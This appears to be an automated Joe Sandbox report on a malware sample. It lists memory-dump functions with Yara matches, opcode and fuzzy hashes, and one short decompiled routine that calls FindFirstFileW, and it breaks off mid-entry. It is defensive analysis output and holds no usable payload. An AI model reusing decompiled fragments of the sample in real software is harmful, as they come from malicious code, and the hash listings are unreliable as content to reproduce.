                                                    • API String ID: 0-2139680195
                                                    • Opcode ID: 44e5bf6a1cf1b6fdd4e824d8d931d15173c3253747fcebfa61298eef2f7b26e2
                                                    • Instruction ID: 692e091639f3fabdfc5c3ea032ecd7080a5eaf5287e8e4acb4fc468d6c775d7a
                                                    • Opcode Fuzzy Hash: 44e5bf6a1cf1b6fdd4e824d8d931d15173c3253747fcebfa61298eef2f7b26e2
                                                    • Instruction Fuzzy Hash: 0BD1217A6047599FCB30CE68DA953DA3BB5FF26390F6442398D59EF602E3324746CA01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321D74 Relevance: 1.6, Strings: 1, Instructions: 394COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: c4da57706816b1e18b6d4005cdb42463a0dc2c8d93aa297e461dd041f534e039
                                                    • Instruction ID: e637f4fc772e576555a496c6ed03b499816805d85f71d2e5ebbb0477b09b9f0c
                                                    • Opcode Fuzzy Hash: c4da57706816b1e18b6d4005cdb42463a0dc2c8d93aa297e461dd041f534e039
                                                    • Instruction Fuzzy Hash: 08718DA3D2A339C9E7D3B030CA917A65E88EF23186F118F55982BE1961B71F4A4D45C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321FB3 Relevance: 1.6, Strings: 1, Instructions: 389COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 7b728c6f0c45cbb2437132c7a46893dbe3d30252187fe43ad23614549cffc340
                                                    • Instruction ID: 1062ccfc0eab267e322d293c72983d6a8fb7a1f83875b159ff28acbb1fe858df
                                                    • Opcode Fuzzy Hash: 7b728c6f0c45cbb2437132c7a46893dbe3d30252187fe43ad23614549cffc340
                                                    • Instruction Fuzzy Hash: 8C61ABB3D2A339C9E7D3A020CAD17A25E88EF23182F118F599C37E1961B71F4A4D4584
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332181E Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 3d05661ec92264c9b1cf102bb586e5422bb10f4ddcd32dc954989d390f5cba87
                                                    • Instruction ID: 523c2ca2f3562790913bc4b7e279dec65c27bcd08390faf35ab3c667c2428885
                                                    • Opcode Fuzzy Hash: 3d05661ec92264c9b1cf102bb586e5422bb10f4ddcd32dc954989d390f5cba87
                                                    • Instruction Fuzzy Hash: 2EA16BA3D2E335D9E7D3B030CA917A65E88DF23186F128F5A9836F1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332DC18 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: |o
                                                    • API String ID: 0-2139680195
                                                    • Opcode ID: 094e2ed7eb6561abec15b45fd3d39e7011fefe658812c6eb1bbb65944945c35a
                                                    • Instruction ID: 196fd4a3b61502ab95e4e8199c2a39b811ae324eae067a7b54639a98de3f0de9
                                                    • Opcode Fuzzy Hash: 094e2ed7eb6561abec15b45fd3d39e7011fefe658812c6eb1bbb65944945c35a
                                                    • Instruction Fuzzy Hash: E1B1327A5047199FCB30CE68D9953DA3BB5EF76390F6442398C4AEF602E3324646CA06
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321C0D Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 5407e27ff86e63b9d7ee62fb3e18f930fdae95d2a0c73f3390d20441613d42ee
                                                    • Instruction ID: 6bd88b43eff9aba9efc2f7b0c0792cbfeca33f1abdf352dc7e2ffd2847c76986
                                                    • Opcode Fuzzy Hash: 5407e27ff86e63b9d7ee62fb3e18f930fdae95d2a0c73f3390d20441613d42ee
                                                    • Instruction Fuzzy Hash: 8B818DA3D2A339CDE7D3B030CA917A65E88EF23186F118F599827E1D61B71F4A4D45C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321EBD Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 00c9309bd73a5bc551cdeb4611e6afd0688babfa72fcab041da54d63e060a9c0
                                                    • Instruction ID: 00511f56b1f94ea064653805db8d7304a221a79a956bfeee882c3b83051f7cd9
                                                    • Opcode Fuzzy Hash: 00c9309bd73a5bc551cdeb4611e6afd0688babfa72fcab041da54d63e060a9c0
                                                    • Instruction Fuzzy Hash: 9F618B63D2A339C9E7D3A0308A917A65E88EF23186F118F599837E1D61B71F4A4D4584
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033219F9 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 0b7b1123a9b96c107dc8ad3bfa913dec440cc6f12dbc35441abe6e5e18434b44
                                                    • Instruction ID: 5aa94bbc438f12fdf0361f75c993ea73958f1deb29f23d2b85b68f0c45c4baac
                                                    • Opcode Fuzzy Hash: 0b7b1123a9b96c107dc8ad3bfa913dec440cc6f12dbc35441abe6e5e18434b44
                                                    • Instruction Fuzzy Hash: D5919DA3D2A739C9E7D3B030CA917A65E88DF23186F118F599837F1961771F4A4D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321995 Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 8e3f3b1114bcb59832b23689d8474fa38fba2cede0210902a52074761b1a8a2e
                                                    • Instruction ID: acc24e26cfe1b58c08b67990c2fe89b85e02c56af03febba4067afe800de6616
                                                    • Opcode Fuzzy Hash: 8e3f3b1114bcb59832b23689d8474fa38fba2cede0210902a52074761b1a8a2e
                                                    • Instruction Fuzzy Hash: 8C916BA3D2A339C9E7D3B030CA917A65E88DF23186F128F5A9C36F1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321B5E Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 71626ae9d62cba2a45a9a41da645b3195a12cbc34166fe444c8cdb8a83c82e56
                                                    • Instruction ID: 27536f05e52c82b28ff61cadd74d69d41a5324cc76f0a58cc723951ffe8bb2de
                                                    • Opcode Fuzzy Hash: 71626ae9d62cba2a45a9a41da645b3195a12cbc34166fe444c8cdb8a83c82e56
                                                    • Instruction Fuzzy Hash: C1819CA3D2A339C9E7D3B030CA917A65E88EF23186F118F599837E1D61B71F4A4D45C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332205D Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 596226a38ef93c671604160d748fb569025c315843a3eb56d117ff251b448046
                                                    • Instruction ID: 5e0c2341fa543c629b349e634cf0ab80099ab9a731a523ba164cefab3b386178
                                                    • Opcode Fuzzy Hash: 596226a38ef93c671604160d748fb569025c315843a3eb56d117ff251b448046
                                                    • Instruction Fuzzy Hash: 4761ACB3D2A739C9E7D3A020CAD17A65E88EF23182F118F599837E1D61B71F4A4D45C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321A63 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 04c8123f2f17c3976ecebb09b43f3cf6203f140e4e14df89f5197205caa77a44
                                                    • Instruction ID: ac3138aa778b1784babbfd6d92199ea275fb355fb030119ae68066a959b32396
                                                    • Opcode Fuzzy Hash: 04c8123f2f17c3976ecebb09b43f3cf6203f140e4e14df89f5197205caa77a44
                                                    • Instruction Fuzzy Hash: CF918CA3D2A339C9E7D3B030CA917A65E88EF23186F118F5A9827F1961B71F4A4D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321D1A Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 620fee0381ff4969355e47b2836998b4ee9cc8cdb87838c97eacc5b0a7e865e6
                                                    • Instruction ID: d1a96c4cef28e38e6b8e86e9f7f55be5d1731f69dc66dcb435759cbaa861bafc
                                                    • Opcode Fuzzy Hash: 620fee0381ff4969355e47b2836998b4ee9cc8cdb87838c97eacc5b0a7e865e6
                                                    • Instruction Fuzzy Hash: 34719DA3D2A339C9E7D3B030CA917A65E88EF23186F118F59982BE1D61B71F4A4D45C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321C6E Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 1b3ec05493ed5357fddd8f8fe8352ffc799fb2817ffad60d207fab47c6f0b310
                                                    • Instruction ID: 3f7bcd30690da4d426d378a4fb1f25c5de766e840581e889ecf498e1dd57acdb
                                                    • Opcode Fuzzy Hash: 1b3ec05493ed5357fddd8f8fe8352ffc799fb2817ffad60d207fab47c6f0b310
                                                    • Instruction Fuzzy Hash: 2D819EA3D2A339C9E7D3B030CA917A65E88EF23186F128F599827E1D61B71F4A4D45C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033223BA Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 74d7dcd497273559f472445f4437a4aa2b205daf3ba928c94381cf6fbe414101
                                                    • Instruction ID: b673fb38628a7feb4d9f746bf391f27f24ebbd628349204453fb7608f7f2595c
                                                    • Opcode Fuzzy Hash: 74d7dcd497273559f472445f4437a4aa2b205daf3ba928c94381cf6fbe414101
                                                    • Instruction Fuzzy Hash: C851B172D2A339CAE7D3A0308AD17A69E88EF33192F118F599C37E1911F71F4A4E4594
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321E55 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 2a4759f3241e05cc67d7ad952050170c4886ee82ad9d44833ac415e472b254f5
                                                    • Instruction ID: 823f721c8684598058e99348da48a3caad38830832de981bf4315a3fe415396b
                                                    • Opcode Fuzzy Hash: 2a4759f3241e05cc67d7ad952050170c4886ee82ad9d44833ac415e472b254f5
                                                    • Instruction Fuzzy Hash: A0718C73D2A339CDE7D3A030CA917A69E88EF23186F118F599C37E1961B71F4A4D4584
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321E00 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: b883014d2283a8caeae9ce5156ea9554b5f571f5c57e5b7fde0d52ba421e5480
                                                    • Instruction ID: 465ba6eb2bf11fcbc1e24b2894abad10bcd3aac049c203b17d3103b68d224e46
                                                    • Opcode Fuzzy Hash: b883014d2283a8caeae9ce5156ea9554b5f571f5c57e5b7fde0d52ba421e5480
                                                    • Instruction Fuzzy Hash: 6E719DA3D2A339C9EBD3B030CA917A65E88EF23182F118F599837E1D61B71F4A4D4584
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332257A Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: b4940c9386f17ecfc557f78bceee7b2246bacfc350353f265d6cf1bc02e888ca
                                                    • Instruction ID: 38b731c4d3777c2ce474a504fb3c7562fc99e9fa886a5ec1f75625fbcb57b894
                                                    • Opcode Fuzzy Hash: b4940c9386f17ecfc557f78bceee7b2246bacfc350353f265d6cf1bc02e888ca
                                                    • Instruction Fuzzy Hash: A4418C72D1A339C9EBD2A0208ED17A66E88EF33181F118B599C3BE1D12B71F4A4D4194
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E0040287E(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C53(2), _t21 - 0x2b8) != 0xffffffff) {
					E00406159( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x28c);
					_push(__esi);
					E00406212();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                    0x00402896
                                                    0x004028b1
                                                    0x004028bc
                                                    0x004028bd
                                                    0x004029f7
                                                    0x00402898
                                                    0x0040289b
                                                    0x0040289e
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040288D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: 021250c25273efcf90ec2003bac179496a6bda1bcfcf12776e6231dad0d009cc
                                                    • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
                                                    • Opcode Fuzzy Hash: 021250c25273efcf90ec2003bac179496a6bda1bcfcf12776e6231dad0d009cc
                                                    • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033276B2 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @cK
                                                    • API String ID: 0-2423457532
                                                    • Opcode ID: 7b5284e68819ecb7b6557e20b1db1a34c787c6dd5234060a4f1005bc37eba557
                                                    • Instruction ID: a47d402d4220fc646637afc4cf888e9109d2d7f0600c37f3aad41ba0b38b247a
                                                    • Opcode Fuzzy Hash: 7b5284e68819ecb7b6557e20b1db1a34c787c6dd5234060a4f1005bc37eba557
                                                    • Instruction Fuzzy Hash: CE619936110A598FC325CE78D9C56CABFB1BF36760B350A58D248EF603E6325207CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332221F Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 09639c11d263f72a1e0735a84edba8a782a3a87e633fccb77a7e2b603310d009
                                                    • Instruction ID: 21b86bc37179c1d629dbf1def57ecd86f116b1edd54f999b73f943d99b0eb117
                                                    • Opcode Fuzzy Hash: 09639c11d263f72a1e0735a84edba8a782a3a87e633fccb77a7e2b603310d009
                                                    • Instruction Fuzzy Hash: 9D518D72D2A739C9E7D3A0208AD17E79E88EF33182F118F599C37E1922B71F4A4D4594
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03322355 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 0b6393b4cd94b1f5e7a6698b59d972a7164c84e45e0e2f0389c5226955ceed43
                                                    • Instruction ID: 1d7d1a390711758c258ce599432efa582c41a03a4bbdc9f528faec462e4ccb8f
                                                    • Opcode Fuzzy Hash: 0b6393b4cd94b1f5e7a6698b59d972a7164c84e45e0e2f0389c5226955ceed43
                                                    • Instruction Fuzzy Hash: B151CF72D2A339C9E7C3A0308AD17A79E88EF33182F118F599C37E1961B71F4A8D4194
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033224E8 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: fa81b61709e2f7b6d231aab993e34e2a416f933534c4534650344a3f08af7900
                                                    • Instruction ID: e5850015585e34d2e7b1ed1ee2213fe0315e5cadcf2ac13d14a014b8ca203039
                                                    • Opcode Fuzzy Hash: fa81b61709e2f7b6d231aab993e34e2a416f933534c4534650344a3f08af7900
                                                    • Instruction Fuzzy Hash: 97419E72D1A339C9EBD3A0308AD17A65E88EF33145F118B599C37E1912B75F4A4E4194
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03322160 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 363ac42ea44e953a9faa5af3637a725f321a79dc685e1734eeab249e6bf8af7c
                                                    • Instruction ID: a797323f00c0fe6c7be5c81e03cdf04b70c3bce025d053554f904bc38baa2a90
                                                    • Opcode Fuzzy Hash: 363ac42ea44e953a9faa5af3637a725f321a79dc685e1734eeab249e6bf8af7c
                                                    • Instruction Fuzzy Hash: 08519CB3D2A339C9E7D3A020CAD17A69E88EF23192F118F599837E1961B71F4A4D4584
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033222C5 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 9c6d3ca0a1d1badb0d46f6f1b23f3784886baf4d72a3d208ab0c7632d150193d
                                                    • Instruction ID: 20b712707283fd423d46ee5a013aca4f67c5fc8ebc2e3ee935d4da7e8737aedb
                                                    • Opcode Fuzzy Hash: 9c6d3ca0a1d1badb0d46f6f1b23f3784886baf4d72a3d208ab0c7632d150193d
                                                    • Instruction Fuzzy Hash: 8051CF72D2E339C9E7C3A1308AD17A69E88EF27182F118F589C3BE1921B71F4A4D4594
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332CB5D Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <uq
                                                    • API String ID: 0-1935987099
                                                    • Opcode ID: 3f574205a2bf808f8436a75af622f097edcc1cb996b5df97e440b0fb92c84cbc
                                                    • Instruction ID: f06d0cde6335690b1c93425cc33e3294f3ccf23164265ddc65c34cd0d0818361
                                                    • Opcode Fuzzy Hash: 3f574205a2bf808f8436a75af622f097edcc1cb996b5df97e440b0fb92c84cbc
                                                    • Instruction Fuzzy Hash: 3D51133A024D548FD325CE78D5D05CABFB4BF36311B342AA98249EFA13F523560ACB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0334537A Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >+g
                                                    • API String ID: 0-2630797903
                                                    • Opcode ID: 5941667ceef5ba36116551e85773cfb0bb384bf135a915f383560083c8cf04d7
                                                    • Instruction ID: f22a45e9d3a12c15962b9d0cb8152cb7dbf65af872a61e28614ad3530ff22ca5
